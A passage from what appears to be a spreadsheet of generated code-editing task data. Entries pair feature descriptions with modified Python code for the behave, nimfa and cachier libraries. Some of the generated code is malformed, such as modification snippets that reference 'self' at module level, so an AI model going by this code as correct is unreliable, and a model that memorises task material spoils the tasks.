configuration (and optional runner class).\n\n    :param config:          Configuration object for behave.\n    :param runner_class:    Runner class to use or none (use Runner class).\n    :return:    0, if successful. Non-zero on failure.\n\n    .. note:: BEST EFFORT, not intended for multi-threaded usage.\n    """\n    # pylint: disable=too-many-branches, too-many-statements, too-many-return-statements\n\n    if config.version:\n        print("behave " + BEHAVE_VERSION)\n        return 0\n\n    # #New - Handle new feature flag\n    if hasattr(config, \'new_feature\') and config.new_feature:\n        print(NEW_FEATURE_MESSAGE)\n        return 0\n\n    if config.tags_help:\n        print_tags_help(config)\n        return 0\n\n    if  config.lang == "help" or config.lang_list:\n        print_language_list()\n        return 0\n\n    if config.lang_help:\n        # -- PROVIDE HELP: For one, specific language\n        language = config.lang_help\n        print_language_help(language)\n        return 0\n\n    if not config.format:\n        config.format = [config.default_format]\n    elif config.format and "format" in config.defaults:\n        # -- CASE: Formatter are specified in behave configuration file.\n        #    Check if formatter are provided on command-line, too.\n        if len(config.format) == len(config.defaults["format"]):\n            # -- NO FORMATTER on command-line: Add default formatter.\n            config.format.append(config.default_format)\n    if "help" in config.format:\n        print_formatters()\n        return 0\n\n    if len(config.outputs) &gt; len(config.format):\n        print("CONFIG-ERROR: More outfiles (%d) than formatters (%d)." % \\\n              (len(config.outputs), len(config.format)))\n        return 1\n\n    if config.runner == "help":\n        print_runners(config.runner_aliases)\n        return 0\n\n    # -- MAIN PART:\n    runner = None\n    failed = True\n    try:\n        reset_runtime()\n        runner = RunnerPlugin(runner_class).make_runner(config)\n        print("USING RUNNER: {0}".format(make_scoped_class_name(runner)))\n        failed = runner.run()\n    except ParserError as e:\n        print(u"ParserError: %s" % e)\n    except ConfigError as e:\n        print(u"ConfigError: %s" % e)\n    except FileNotFoundError as e:\n        print(u"FileNotFoundError: %s" % e)\n    except InvalidFileLocationError as e:\n        print(u"InvalidFileLocationError: %s" % e)\n    except InvalidFilenameError as e:\n        print(u"InvalidFilenameError: %s" % e)\n    except ModuleNotFoundError as e:\n        print(u"ModuleNotFoundError: %s" % e)\n    except ClassNotFoundError as e:\n        print(u"ClassNotFoundError: %s" % e)\n    except InvalidClassError as e:\n        print(u"InvalidClassError: %s" % e)\n    except ImportError as e:\n        print(u"%s: %s" % (e.__class__.__name__, e))\n        if DEBUG:\n            raise\n    except ConstraintError as e:\n        print(u"ConstraintError: %s" % e)\n    except Exception as e:\n        # -- DIAGNOSTICS:\n        text = _text(e)\n        print(u"Exception %s: %s" % (e.__class__.__name__, text))\n        raise\n\n    if config.show_snippets and runner and runner.undefined_steps:\n        print_undefined_step_snippets(runner.undefined_steps,\n                                      colored=config.has_colored_mode())\n\n    return_code = 0\n    if failed:\n        return_code = 1\n    return return_code\n\n# #Modify - main function remains the same, config object now supports new_feature attribute\ndef main(args=None):\n    """Main function to run behave (as program).\n\n    :param args:    Command-line args (or string) to use.\n    :return: 0, if successful. Non-zero, in case of errors/failures.\n    """\n    try:\n        config = Configuration(args)\n        return run_behave(config)\n    except ConfigError as e:\n        exception_class_name = e.__class__.__name__\n        print("%s: %s" % (exception_class_name, e))\n    except TagExpressionError as e:\n        print("TagExpressionError: %s" % e)\n    return 1    # FAILED:\n\nif __name__ == "__main__":\n    # -- EXAMPLE: main("--version")\n    sys.exit(main())'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def run_behave(config, runner_class=None):\n    """Run behave with configuration (and optional runner class).\n\n    :param config:          Configuration object for behave.\n    :param runner_class:    Runner class to use or none (use Runner class).\n    :return:    0, if successful. Non-zero on failure.\n\n    .. note:: BEST EFFORT, not intended for multi-threaded usage.\n    """\n    # pylint: disable=too-many-branches, too-many-statements, too-many-return-statements\n\n    if config.version:\n        print("behave " + BEHAVE_VERSION)\n        return 0\n\n    if config.tags_help:\n        print_tags_help(config)\n        return 0\n\n    if  config.lang == "help" or config.lang_list:\n        print_language_list()\n        return 0\n\n    if config.lang_help:\n        # -- PROVIDE HELP: For one, specific language\n        language = config.lang_help\n        print_language_help(language)\n        return 0\n\n    if not config.format:\n        config.format = [config.default_format]\n    elif config.format and "format" in config.defaults:\n        # -- CASE: Formatter are specified in behave configuration file.\n        #    Check if formatter are provided on command-line, too.\n        if len(config.format) == len(config.defaults["format"]):\n            # -- NO FORMATTER on command-line: Add default formatter.\n            config.format.append(config.default_format)\n    if "help" in config.format:\n        print_formatters()\n        return 0\n\n    if len(config.outputs) &gt; len(config.format):\n        print("CONFIG-ERROR: More outfiles (%d) than formatters (%d)." % \\\n              (len(config.outputs), len(config.format)))\n        return 1\n\n    if config.runner == "help":\n        print_runners(config.runner_aliases)\n        return 0\n\n    # -- NEW: Check for new feature flag\n    if config.new_feature:\n        new_feature_function(config)\n        return 0\n\n    # -- MAIN PART:\n    runner = None\n    failed = True\n    try:\n        reset_runtime()\n        runner = RunnerPlugin(runner_class).make_runner(config)\n        print("USING RUNNER: {0}".format(make_scoped_class_name(runner)))\n        failed = runner.run()\n    except ParserError as e:\n        print(u"ParserError: %s" % e)\n    except ConfigError as e:\n        print(u"ConfigError: %s" % e)\n    except FileNotFoundError as e:\n        print(u"FileNotFoundError: %s" % e)\n    except InvalidFileLocationError as e:\n        print(u"InvalidFileLocationError: %s" % e)\n    except InvalidFilenameError as e:\n        print(u"InvalidFilenameError: %s" % e)\n    except ModuleNotFoundError as e:\n        print(u"ModuleNotFoundError: %s" % e)\n    except ClassNotFoundError as e:\n        print(u"ClassNotFoundError: %s" % e)\n    except InvalidClassError as e:\n        print(u"InvalidClassError: %s" % e)\n    except ImportError as e:\n        print(u"%s: %s" % (e.__class__.__name__, e))\n        if DEBUG:\n            raise\n    except ConstraintError as e:\n        print(u"ConstraintError: %s" % e)\n    except Exception as e:\n        # -- DIAGNOSTICS:\n        text = _text(e)\n        print(u"Exception %s: %s" % (e.__class__.__name__, text))\n        raise\n\n    if config.show_snippets and runner and runner.undefined_steps:\n        print_undefined_step_snippets(runner.undefined_steps,\n                                      colored=config.has_colored_mode())\n\n    return_code = 0\n    if failed:\n        return_code = 1\n    return return_code', '#file 2': 'def main(args=None):\n    """Main function to run behave (as program).\n\n    :param args:    Command-line args (or string) to use.\n    :return: 0, if successful. Non-zero, in case of errors/failures.\n    """\n    try:\n        config = Configuration(args)\n        return run_behave(config)\n    except ConfigError as e:\n        exception_class_name = e.__class__.__name__\n        print("%s: %s" % (exception_class_name, e))\n    except TagExpressionError as e:\n        print("TagExpressionError: %s" % e)\n    return 1    # FAILED:', '#file 3': 'def print_tags_help(config):\n    print(TAG_EXPRESSIONS_HELP)\n\n    current_tag_expression = config.tag_expression.to_string()\n    print("\\nCURRENT TAG_EXPRESSION: {0}".format(current_tag_expression))\n    if config.verbose:\n        # -- SHOW LOW-LEVEL DETAILS:\n        text = repr(config.tag_expression).replace("Literal(", "Tag(")\n        print("  means: {0}".format(text))', '#file 4': 'def new_feature_function(config):\n    """New feature function to be invoked from #file 1."""\n    print("New feature function invoked with config:", config)\n    # Additional functionality can be added here'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'Random_c.initialize(self, V, rank, options) method in nimfa/nimfa/methods/seeding/random_c.py', 'invoking_code_segment': 'Smf._compatibility(self) method in nimfa/nimfa/models/smf.py which calls seeding.methods[self.seed]()', 'feature_description': 'Add a custom seeding method to initialize the basis and mixture matrices by extending the Random_c class with a new CustomSeeding class that allows users to provide custom initialization logic while maintaining compatibility with the existing seeding framework.', 'modified_complete_code': '# File 1: nimfa/nimfa/methods/seeding/random_c.py\n"""\n#######################################\nRandom_c (``methods.seeding.random_c``)\n#######################################\n\nRandom C [Albright2006]_ is inexpensive initialization method for nonnegative\nmatrix factorization. It is inspired by the C matrix in of the CUR decomposition.\nThe Random C initialization is similar to the Random Vcol method (see\nmod:`methods.seeding.random_vcol`) except it chooses p columns at random from\nthe longest (in 2-norm) columns in target matrix (V), which generally means the\nmost dense columns of target matrix.\n\nInitialization of each column of basis matrix is done by averaging p random\ncolumns of l longest columns of target matrix. Initialization\nof mixture matrix is similar except for row operations.    \n"""\n\nfrom nimfa.utils.linalg import *\n\n__all__ = [\'Random_c\', \'CustomSeeding\']\n\n\nclass Random_c(object):\n\n    def __init__(self):\n        self.name = "random_c"\n\n    def initialize(self, V, rank, options):\n        """\n        Return initialized basis and mixture matrix. Initialized matrices are\n        of the same type as passed target matrix.\n        \n        :param V: Target matrix, the matrix for MF method to estimate. \n        :type V: One of the :class:`scipy.sparse` sparse matrices types or or\n                :class:`numpy.matrix`\n        :param rank: Factorization rank. \n        :type rank: `int`\n        :param options: Specify the algorithm and model specific options (e.g. initialization of\n                extra matrix factor, seeding parameters).\n\n                Option ``p_c`` represents the number of columns of target matrix\n                used to average the column of basis matrix. Default\n                value for ``p_c`` is 1/5 * (target.shape[1]).\n\n                Option ``p_r`` represents the number of rows of target matrix used\n                to average the row of basis matrix. Default value for\n                ``p_r`` is 1/5 * (target.shape[0]).\n\n                Option ``l_c`` represents the first l_c columns of target matrix sorted\n                descending by length (2-norm). Default value for ``l_c`` is  1/2 * (target.shape[1]).\n\n                Option ``l_r`` represent first l_r rows of target matrix sorted\n                descending by length (2-norm). Default value for\n                ``l_r`` is 1/2 * (target.shape[0]).\n        :type options: `dict`\n        """\n        self.rank = rank\n        self.p_c = options.get(\'p_c\', int(ceil(1. / 5 * V.shape[1])))\n        self.p_r = options.get(\'p_r\', int(ceil(1. / 5 * V.shape[0])))\n        self.l_c = options.get(\'l_c\', int(ceil(1. / 2 * V.shape[1])))\n        self.l_r = options.get(\'l_r\', int(ceil(1. / 2 * V.shape[0])))\n        self.prng = np.random.RandomState()\n        if sp.isspmatrix(V):\n            self.W = sp.lil_matrix((V.shape[0], self.rank))\n            self.H = sp.lil_matrix((self.rank, V.shape[1]))\n            top_c = sorted(enumerate([norm(V[:, i], 2)\n                           for i in range(V.shape[1])]), key=itemgetter(1), reverse=True)[:self.l_c]\n            top_r = sorted(\n                enumerate([norm(V[i, :], 2) for i in range(V.shape[0])]), key=itemgetter(1), reverse=True)[:self.l_r]\n        else:\n            self.W = np.mat(np.zeros((V.shape[0], self.rank)))\n            self.H = np.mat(np.zeros((self.rank, V.shape[1])))\n            top_c = sorted(enumerate([norm(V[:, i], 2)\n                           for i in range(V.shape[1])]), key=itemgetter(1), reverse=True)[:self.l_c]\n            top_r = sorted(\n                enumerate([norm(V[i, :], 2) for i in range(V.shape[0])]), key=itemgetter(1), reverse=True)[:self.l_r]\n        top_c = np.mat(list(zip(*top_c))[0])\n        top_r = np.mat(list(zip(*top_r))[0])\n        for i in range(self.rank):\n            self.W[:, i] = V[\n                :, top_c[0, self.prng.randint(low=0, high=self.l_c, size=self.p_c)].tolist()[0]].mean(axis=1)\n            self.H[i, :] = V[\n                top_r[0, self.prng.randint(low=0, high=self.l_r, size=self.p_r)].tolist()[0], :].mean(axis=0)\n        # return sparse or dense initialization\n        if sp.isspmatrix(V):\n            return self.W.tocsr(), self.H.tocsr()\n        else:\n            return self.W, self.H\n\n    def __repr__(self):\n        return "random_c.Random_c()"\n\n    def __str__(self):\n        return self.name\n\n\n#New: CustomSeeding class for user-defined initialization\nclass CustomSeeding(object):\n    """\n    Custom seeding method that allows users to provide their own initialization logic.\n    Users can subclass this and override the initialize method with custom logic.\n    """\n\n    def __init__(self, init_func=None):\n        """\n        Initialize CustomSeeding with optional custom initialization function.\n        \n        :param init_func: Optional callable that takes (V, rank, options) and returns (W, H)\n        :type init_func: callable or None\n        """\n        self.name = "custom_seeding"\n        self.init_func = init_func\n\n    def initialize(self, V, rank, options):\n        """\n        Return initialized basis and mixture matrix using custom logic.\n        \n        :param V: Target matrix\n        :type V: scipy.sparse matrix or numpy.matrix\n        :param rank: Factorization rank\n        :type rank: int\n        :param options: Algorithm and model specific options\n        :type options: dict\n        :return: Initialized basis (W) and mixture (H) matrices\n        :rtype: tuple of matrices\n        """\n        if self.init_func is not None:\n            return self.init_func(V, rank, options)\n        else:\n            # Default: random initialization if no custom function provided\n            if sp.isspmatrix(V):\n                W = sp.lil_matrix((V.shape[0], rank))\n                H = sp.lil_matrix((rank, V.shape[1]))\n                W.data = [np.random.rand(len(row)) for row in W.rows]\n                H.data = [np.random.rand(len(row)) for row in H.rows]\n                return W.tocsr(), H.tocsr()\n            else:\n                W = np.mat(np.random.rand(V.shape[0], rank))\n                H = np.mat(np.random.rand(rank, V.shape[1]))\n                return W, H\n\n    def set_init_func(self, init_func):\n        """\n        Set or update the custom initialization function.\n        \n        :param init_func: Callable that takes (V, rank, options) and returns (W, H)\n        :type init_func: callable\n        """\n        self.init_func = init_func\n\n    def __repr__(self):\n        return "random_c.CustomSeeding()"\n\n    def __str__(self):\n        return self.name\n\n\n# File 2: nimfa/nimfa/methods/seeding/__init__.py\n"""\n    This package contains implementations of initialization methods for matrix factorization.\n"""\n\nfrom .nndsvd import *\nfrom .random import *\nfrom .fixed import *\nfrom .random_c import *\nfrom .random_vcol import *\n\n#Modify: Added CustomSeeding to methods dictionary\nmethods = {"random": Random,\n           "fixed": Fixed,\n           "nndsvd": Nndsvd,\n           "random_c": Random_c,\n           "random_vcol": Random_vcol,\n           "custom_seeding": CustomSeeding,\n           "none": None}\n\n\n# File 3: nimfa/nimfa/models/smf.py (relevant modifications)\n"""\n    #####################\n    Smf (``models.smf``)\n    #####################\n"""\n\nimport nimfa.utils.utils as utils\nfrom nimfa.utils.linalg import *\nfrom nimfa.methods import seeding\n\n\nclass Smf(object):\n    """\n    This class defines a common interface / model to handle standard MF models in\n    a generic way.\n    \n    It contains definitions of the minimum set of generic methods that are used in \n    common computations and matrix factorizations. Besides it contains some quality\n    and performance measures about factorizations.\n    """\n    def __init__(self, params):\n        self.model_name = "smf"\n        self.__dict__.update(params)\n        self.V1 = None\n        self.H1 = None\n        # do not copy target and factor matrices into the program\n        if sp.isspmatrix(self.V):\n            self.V = self.V.tocsr().astype(\'d\')\n        else:\n            self.V = np.asmatrix(self.V) if self.V.dtype == np.dtype(\n                float) else np.asmatrix(self.V, dtype=\'d\')\n        if self.W is not None or self.H is not None or self.H1 is not None:\n            raise utils.MFError("Fixed initialized is not supported by SMF model.")\n        self._compatibility()\n\n    def __call__(self):\n        """Run the specified MF algorithm."""\n        return self.factorize()\n\n    def basis(self):\n        """Return the matrix of basis vectors (factor 1 matrix)."""\n        return self.W\n\n    def target(self, idx=None):\n        """\n        Return the target matrix to estimate.\n        \n        :param idx: Used in the multiple MF model. In standard MF ``idx`` is always None.\n        :type idx: None\n        """\n        return self.V\n\n    def coef(self, idx=None):\n        """\n        Return the matrix of mixture coefficients (factor 2 matrix).\n        \n        :param idx: Used in the multiple MF model. In standard MF ``idx`` is always None.\n        :type idx: None\n        """\n        return self.H\n\n    def fitted(self, idx=None):\n        """\n        Compute the estimated target matrix according to the MF algorithm model.\n        \n        :param idx: Used in the multiple MF model. In standard MF ``idx`` is always None.\n        :type idx: None\n        """\n        return dot(self.W, self.H)\n\n    def distance(self, metric=\'euclidean\', idx=None):\n        """\n        Return the loss function value.\n        \n        :param distance: Specify distance metric to be used. Possible are Euclidean and\n           Kullback-Leibler (KL) divergence. Strictly, KL is not a metric.\n        :type distance: `str` with values \'euclidean\' or \'kl\'\n\n        :param idx: Used in the multiple MF model. In standard MF ``idx`` is always None.\n        :type idx: None\n        """\n        if metric.lower() == \'euclidean\':\n            R = self.V - dot(self.W, self.H)\n            return power(R, 2).sum()\n        elif metric.lower() == \'kl\':\n            Va = dot(self.W, self.H)\n            return (multiply(self.V, sop(elop(self.V, Va, div), op=log)) - self.V + Va).sum()\n        else:\n            raise utils.MFError("Unknown distance metric.")\n\n    def residuals(self, idx=None):\n        """\n        Return residuals matrix between the target matrix and its MF estimate.\n        \n        :param idx: Used in the multiple MF model. In standard MF ``idx`` is always None.\n        :type idx: None\n        """\n        return self.V - dot(self.W, self.H)\n\n    def _compatibility(self):\n        """\n        Check if chosen seeding method is compatible with chosen factorization\n        method or fixed initialization is passed.\n\n        :param mf_model: The underlying initialized model of matrix factorization.\n        :type mf_model: Class inheriting :class:`models.nmf.Nmf`\n        """\n        W = self.basis()\n        H = self.coef(0)\n        H1 = self.coef(1) if self.model_name == \'mm\' else None\n        if self.seed is None and W is None and H is None and H1 is None:\n            self.seed = None if "none" in self.aseeds else "random"\n        if W is not None and H is not None:\n            if self.seed is not None and self.seed is not "fixed":\n                raise utils.MFError("Initial factorization is fixed.")\n            else:\n                self.seed = seeding.fixed.Fixed()\n                self.seed._set_fixed(W=W, H=H, H1=H1)\n        self.__is_smdefined()\n        self.__compatibility()\n\n    def __is_smdefined(self):\n        """Check if MF and seeding methods are well defined."""\n        if isinstance(self.seed, str):\n            if self.seed in seeding.methods:\n                #Modify: Support instantiation of CustomSeeding with optional parameters\n                if self.seed == "custom_seeding":\n                    custom_init_func = getattr(self, \'custom_init_func\', None)\n                    self.seed = seeding.methods[self.seed](init_func=custom_init_func)\n                else:\n                    self.seed = seeding.methods[self.seed]()\n            else:\n                raise utils.MFError("Unrecognized seeding method.")\n        else:\n            if not str(self.seed).lower() in seeding.methods:\n                raise utils.MFError("Unrecognized seeding method.")\n\n    def __compatibility(self):\n        """Check if MF model is compatible with the seeding method."""\n        if not str(self.seed).lower() in self.aseeds:\n            raise utils.MFError("MF model is incompatible with the seeding method.")\n'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def initialize(self, V, rank, options):\n        self.rank = rank\n        self.p_c = options.get(\'p_c\', int(ceil(1. / 5 * V.shape[1])))\n        self.p_r = options.get(\'p_r\', int(ceil(1. / 5 * V.shape[0])))\n        self.l_c = options.get(\'l_c\', int(ceil(1. / 2 * V.shape[1])))\n        self.l_r = options.get(\'l_r\', int(ceil(1. / 2 * V.shape[0])))\n        self.prng = np.random.RandomState()\n        if sp.isspmatrix(V):\n            self.W = sp.lil_matrix((V.shape[0], self.rank))\n            self.H = sp.lil_matrix((self.rank, V.shape[1]))\n            top_c = sorted(enumerate([norm(V[:, i], 2)\n                           for i in range(V.shape[1])]), key=itemgetter(1), reverse=True)[:self.l_c]\n            top_r = sorted(\n                enumerate([norm(V[i, :], 2) for i in range(V.shape[0])]), key=itemgetter(1), reverse=True)[:self.l_r]\n        else:\n            self.W = np.mat(np.zeros((V.shape[0], self.rank)))\n            self.H = np.mat(np.zeros((self.rank, V.shape[1])))\n            top_c = sorted(enumerate([norm(V[:, i], 2)\n                           for i in range(V.shape[1])]), key=itemgetter(1), reverse=True)[:self.l_c]\n            top_r = sorted(\n                enumerate([norm(V[i, :], 2) for i in range(V.shape[0])]), key=itemgetter(1), reverse=True)[:self.l_r]\n        top_c = np.mat(list(zip(*top_c))[0])\n        top_r = np.mat(list(zip(*top_r))[0])\n        for i in range(self.rank):\n            self.W[:, i] = V[ \n                :, top_c[0, self.prng.randint(low=0, high=self.l_c, size=self.p_c)].tolist()[0]].mean(axis=1)\n            self.H[i, :] = V[ \n                top_r[0, self.prng.randint(low=0, high=self.l_r, size=self.p_r)].tolist()[0], :].mean(axis=0)\n        # return sparse or dense initialization\n        if sp.isspmatrix(V):\n            return self.W.tocsr(), self.H.tocsr()\n        else:\n            return self.W, self.H\n\n#Modify\nif self.seed == "custom_seeding":\n    from custom_seeding import CustomSeeding\n    self.seed = CustomSeeding()', '#file 2': 'def __init__(self, params):\n        self.model_name = "smf"\n        self.__dict__.update(params)\n        self.V1 = None\n        self.H1 = None\n        # do not copy target and factor matrices into the program\n        if sp.isspmatrix(self.V):\n            self.V = self.V.tocsr().astype(\'d\')\n        else:\n            self.V = np.asmatrix(self.V) if self.V.dtype == np.dtype(\n                float) else np.asmatrix(self.V, dtype=\'d\')\n        if self.W is not None or self.H is not None or self.H1 is not None:\n            raise utils.MFError("Fixed initialized is not supported by SMF model.")\n        self._compatibility()\n\n#Modify\nif self.seed == "custom_seeding":\n    from custom_seeding import CustomSeeding\n    self.seed = CustomSeeding()', '#file 3': 'def _compatibility(self):\n        """\n        Check if chosen seeding method is compatible with chosen factorization\n        method or fixed initialization is passed.\n\n        :param mf_model: The underlying initialized model of matrix factorization.\n        :type mf_model: Class inheriting :class:`models.nmf.Nmf`\n        """\n        W = self.basis()\n        H = self.coef(0)\n        H1 = self.coef(1) if self.model_name == \'mm\' else None\n        if self.seed is None and W is None and H is None and H1 is None:\n            self.seed = None if "none" in self.aseeds else "random"\n        if W is not None and H is not None:\n            if self.seed is not None and self.seed is not "fixed":\n                raise utils.MFError("Initial factorization is fixed.")\n            else:\n                self.seed = seeding.fixed.Fixed()\n                self.seed._set_fixed(W=W, H=H, H1=H1)\n        self.__is_smdefined()\n        self.__compatibility()\n\n#Modify\nif self.seed == "custom_seeding":\n    from custom_seeding import CustomSeeding\n    self.seed = CustomSeeding()', '#file 4': 'class CustomSeeding(object):\n    def __init__(self):\n        self.name = "custom_seeding"\n\n    def initialize(self, V, rank, options):\n        # Custom initialization logic\n        self.rank = rank\n        self.W = np.random.rand(V.shape[0], rank)\n        self.H = np.random.rand(rank, V.shape[1])\n        return self.W, self.H\n\n    def __repr__(self):\n        return "custom_seeding.CustomSeeding()"\n\n    def __str__(self):\n        return self.name'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def _convert_args_kwargs(func, _is_method: bool, args: tuple, kwds: dict) -&gt; dict: in cachier/src/cachier/core.py - This function converts mixed positional and keyword arguments to aggregated kwargs, handling default parameter values.', 'invoking_code_segment': 'kwargs = _convert_args_kwargs(func, _is_method=core.func_is_method, args=args, kwds=kwds) in func_wrapper() and _precache_value() functions in cachier/src/cachier/core.py, and test_default_kwargs_handling() in cachier/tests/test_defaults.py', 'feature_description': "Add a new feature to handle default keyword arguments more flexibly by introducing a parameter to control whether default values should be included in the converted kwargs, and add a new decorator parameter 'include_defaults' to allow users to customize this behavior per function.", 'modified_complete_code': '# cachier/src/cachier/core.py - MODIFIED SECTIONS\n\n# #Modify - Updated function signature to include include_defaults parameter\ndef _convert_args_kwargs(\n    func, _is_method: bool, args: tuple, kwds: dict, include_defaults: bool = True\n) -&gt; dict:\n    """Convert mix of positional and keyword arguments to aggregated kwargs.\n    \n    Arguments:\n    ---------\n    func : callable\n        The function to inspect\n    _is_method : bool\n        Whether the function is a method\n    args : tuple\n        Positional arguments\n    kwds : dict\n        Keyword arguments\n    include_defaults : bool, optional\n        Whether to include default parameter values in the result.\n        Defaults to True for backward compatibility.\n    """\n    # unwrap if the function is functools.partial\n    if hasattr(func, "func"):\n        args = func.args + args\n        kwds.update({k: v for k, v in func.keywords.items() if k not in kwds})\n        func = func.func\n    func_params = list(inspect.signature(func).parameters)\n    args_as_kw = dict(\n        zip(func_params[1:], args[1:])\n        if _is_method\n        else zip(func_params, args)\n    )\n    # #Modify - Conditionally init with default values based on include_defaults parameter\n    if include_defaults:\n        kwargs = {\n            k: v.default\n            for k, v in inspect.signature(func).parameters.items()\n            if v.default is not inspect.Parameter.empty\n        }\n    else:\n        kwargs = {}\n    # merge args expanded as kwargs and the original kwds\n    kwargs.update(dict(**args_as_kw, **kwds))\n    return OrderedDict(sorted(kwargs.items()))\n\n# #Modify - Updated cachier decorator signature to include include_defaults parameter\ndef cachier(\n    hash_func: Optional[HashFunc] = None,\n    hash_params: Optional[HashFunc] = None,\n    backend: Optional[Backend] = None,\n    mongetter: Optional[Mongetter] = None,\n    stale_after: Optional[datetime.timedelta] = None,\n    next_time: Optional[bool] = None,\n    cache_dir: Optional[Union[str, os.PathLike]] = None,\n    pickle_reload: Optional[bool] = None,\n    separate_files: Optional[bool] = None,\n    wait_for_calc_timeout: Optional[int] = None,\n    allow_none: Optional[bool] = None,\n    include_defaults: Optional[bool] = None,  # #New\n):\n    """Wrap as a persistent, stale-free memoization decorator.\n    \n    ... (existing docstring) ...\n    \n    include_defaults : bool, optional\n        If set to True, default parameter values will be included in the cache\n        key calculation. If False, only explicitly provided arguments are used.\n        Defaults to True for backward compatibility.\n    """\n    # Check for deprecated parameters\n    if hash_params is not None:\n        message = (\n            "hash_params will be removed in a future release, "\n            "please use hash_func instead"\n        )\n        warn(message, DeprecationWarning, stacklevel=2)\n        hash_func = hash_params\n    # Update parameters with defaults if input is None\n    backend = _update_with_defaults(backend, "backend")\n    mongetter = _update_with_defaults(mongetter, "mongetter")\n    # #New - Update include_defaults with defaults if input is None\n    include_defaults = _update_with_defaults(include_defaults, "include_defaults")\n    # Override the backend parameter if a mongetter is provided.\n    if callable(mongetter):\n        backend = "mongo"\n    core: _BaseCore\n    if backend == "pickle":\n        core = _PickleCore(\n            hash_func=hash_func,\n            pickle_reload=pickle_reload,\n            cache_dir=cache_dir,\n            separate_files=separate_files,\n            wait_for_calc_timeout=wait_for_calc_timeout,\n        )\n    elif backend == "mongo":\n        core = _MongoCore(\n            hash_func=hash_func,\n            mongetter=mongetter,\n            wait_for_calc_timeout=wait_for_calc_timeout,\n        )\n    elif backend == "memory":\n        core = _MemoryCore(\n            hash_func=hash_func, wait_for_calc_timeout=wait_for_calc_timeout\n        )\n    else:\n        raise ValueError("specified an invalid core: %s" % backend)\n\n    def _cachier_decorator(func):\n        core.set_func(func)\n\n        @wraps(func)\n        def func_wrapper(*args, **kwds):\n            nonlocal allow_none, include_defaults  # #Modify - Added include_defaults to nonlocal\n            _allow_none = _update_with_defaults(allow_none, "allow_none", kwds)\n            # #New - Get include_defaults from kwds or use decorator parameter\n            _include_defaults = kwds.pop("cachier__include_defaults", include_defaults if include_defaults is not None else True)\n            # print(\'Inside general wrapper for {}.\'.format(func.__name__))\n            ignore_cache = _pop_kwds_with_deprecation(\n                kwds, "ignore_cache", False\n            )\n            overwrite_cache = _pop_kwds_with_deprecation(\n                kwds, "overwrite_cache", False\n            )\n            verbose = _pop_kwds_with_deprecation(kwds, "verbose_cache", False)\n            ignore_cache = kwds.pop("cachier__skip_cache", ignore_cache)\n            overwrite_cache = kwds.pop(\n                "cachier__overwrite_cache", overwrite_cache\n            )\n            verbose = kwds.pop("cachier__verbose", verbose)\n            _stale_after = _update_with_defaults(\n                stale_after, "stale_after", kwds\n            )\n            _next_time = _update_with_defaults(next_time, "next_time", kwds)\n            # #Modify - Pass include_defaults parameter to _convert_args_kwargs\n            kwargs = _convert_args_kwargs(\n                func, _is_method=core.func_is_method, args=args, kwds=kwds, include_defaults=_include_defaults\n            )\n\n            _print = lambda x: None  # noqa: E731\n            if verbose:\n                _print = print\n            if ignore_cache or not _default_params["caching_enabled"]:\n                return (\n                    func(args[0], **kwargs)\n                    if core.func_is_method\n                    else func(**kwargs)\n                )\n            key, entry = core.get_entry((), kwargs)\n            if overwrite_cache:\n                return _calc_entry(core, key, func, args, kwds)\n            if entry is None:\n                _print("No entry found. No current calc. Calling like a boss.")\n                return _calc_entry(core, key, func, args, kwds)\n            _print("Entry found.")\n            if _allow_none or entry.get("value", None) is not None:\n                _print("Cached result found.")\n                now = datetime.datetime.now()\n                if now - entry["time"] &lt;= _stale_after:\n                    _print("And it is fresh!")\n                    return entry["value"]\n                _print("But it is stale... :(")\n                if entry["being_calculated"]:\n                    if _next_time:\n                        _print("Returning stale.")\n                        return entry["value"]  # return stale val\n                    _print("Already calc. Waiting on change.")\n                    try:\n                        return core.wait_on_entry_calc(key)\n                    except RecalculationNeeded:\n                        return _calc_entry(core, key, func, args, kwds)\n                if _next_time:\n                    _print("Async calc and return stale")\n                    try:\n                        core.mark_entry_being_calculated(key)\n                        _get_executor().submit(\n                            _function_thread, core, key, func, args, kwds\n                        )\n                    finally:\n                        core.mark_entry_not_calculated(key)\n                    return entry["value"]\n                _print("Calling decorated function and waiting")\n                return _calc_entry(core, key, func, args, kwds)\n            if entry["being_calculated"]:\n                _print("No value but being calculated. Waiting.")\n                try:\n                    return core.wait_on_entry_calc(key)\n                except RecalculationNeeded:\n                    return _calc_entry(core, key, func, args, kwds)\n            _print("No entry found. No current calc. Calling like a boss.")\n            return _calc_entry(core, key, func, args, kwds)\n\n        def _clear_cache():\n            """Clear the cache."""\n            core.clear_cache()\n\n        def _clear_being_calculated():\n            """Mark all entries in this cache as not being calculated."""\n            core.clear_being_calculated()\n\n        def _cache_dpath():\n            """Return the path to the cache dir, if exists; None if not."""\n            return getattr(core, "cache_dir", None)\n\n        def _precache_value(*args, value_to_cache, **kwds):  # noqa: D417\n            """Add an initial value to the cache.\n\n            Arguments:\n            ---------\n            value_to_cache : any\n                entry to be written into the cache\n\n            """\n            # #Modify - Pass include_defaults to _convert_args_kwargs in _precache_value\n            _include_defaults = kwds.pop("cachier__include_defaults", include_defaults if include_defaults is not None else True)\n            kwargs = _convert_args_kwargs(\n                func, _is_method=core.func_is_method, args=args, kwds=kwds, include_defaults=_include_defaults\n            )\n            return core.precache_value((), kwargs, value_to_cache)\n\n        func_wrapper.clear_cache = _clear_cache\n        func_wrapper.clear_being_calculated = _clear_being_calculated\n        func_wrapper.cache_dpath = _cache_dpath\n        func_wrapper.precache_value = _precache_value\n        return func_wrapper\n\n    return _cachier_decorator\n\n# cachier/tests/test_defaults.py - NEW TEST SECTION\n\n# #New - Add test for include_defaults parameter\ndef test_include_defaults_parameter(tmpdir):\n    """Test that include_defaults parameter controls default value handling."""\n    call_count_with_defaults = 0\n    call_count_without_defaults = 0\n\n    @cachier.cachier(cache_dir=tmpdir / "with_defaults", include_defaults=True)\n    def func_with_defaults(a, b=2):\n        nonlocal call_count_with_defaults\n        call_count_with_defaults += 1\n        return a + b\n\n    @cachier.cachier(cache_dir=tmpdir / "without_defaults", include_defaults=False)\n    def func_without_defaults(a, b=2):\n        nonlocal call_count_without_defaults\n        call_count_without_defaults += 1\n        return a + b\n\n    func_with_defaults.clear_cache()\n    func_without_defaults.clear_cache()\n\n    # With include_defaults=True, func_with_defaults(1) and func_with_defaults(1, 2) should use same cache\n    assert call_count_with_defaults == 0\n    result1 = func_with_defaults(1)\n    assert result1 == 3\n    assert call_count_with_defaults == 